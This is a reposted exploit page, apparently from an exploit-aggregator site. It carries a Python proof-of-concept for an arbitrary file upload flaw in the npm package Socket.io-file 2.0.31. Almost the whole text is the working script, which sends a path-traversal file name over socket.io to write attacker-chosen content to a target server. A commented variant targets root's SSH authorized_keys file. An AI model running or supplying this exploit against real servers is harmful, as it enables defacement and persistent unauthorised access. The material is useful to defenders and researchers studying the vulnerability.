Socket.io-file 2.0.31 Arbitrary File Upload exploit

4 years ago 198
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=PACKETSTORM:158620 # Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload # Date: 2020-07-02 # Exploit Author: Cr0wTom # Vendor Homepage: https://www.npmjs.com/package/socket.io-file # Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31 # Version: <= v2.0.31 # Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0 # CVE: - # Requirements: pip install socketIO-client-nexus==0.7.6 #!/usr/bin/env python import sys import json import os from socketIO_client_nexus import SocketIO, LoggingNamespace def file_creation(RHOST, RPORT): print ('Initiating connection...') with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO: print ('Creating file...') # Example server running in /home/testuser/Documents/socket-app so customize the path appropriately # Change the "name" option if you want to create an other file in an different path of the system socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}}) # Example for server running with root access: # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}}) print ('Writing data to file...') # Add the data you want to get written to the file data = "Exploited by Cr0wTom" json_string = json.dumps(data) socketIO.once("socket.io-file::request::u_0", on_aaa_response) socketIO.emit("socket.io-file::stream::u_0", json_string) def on_aaa_response(*args): print('on_aaa_response', args) def print_usage(): print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality') print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n') print ('Usage: python3 exploit.py <RHOST> <RPORT>') print ('RHOST The target host IP address or domain.') print ('RPORT The target host port number of the nodejs server.') if __name__ == '__main__': # ensure we have at least an IP and Port if len(sys.argv) < 3: print_usage() sys.exit(1) print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality') print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n') file_creation(sys.argv[1], sys.argv[2])
Read Entire Article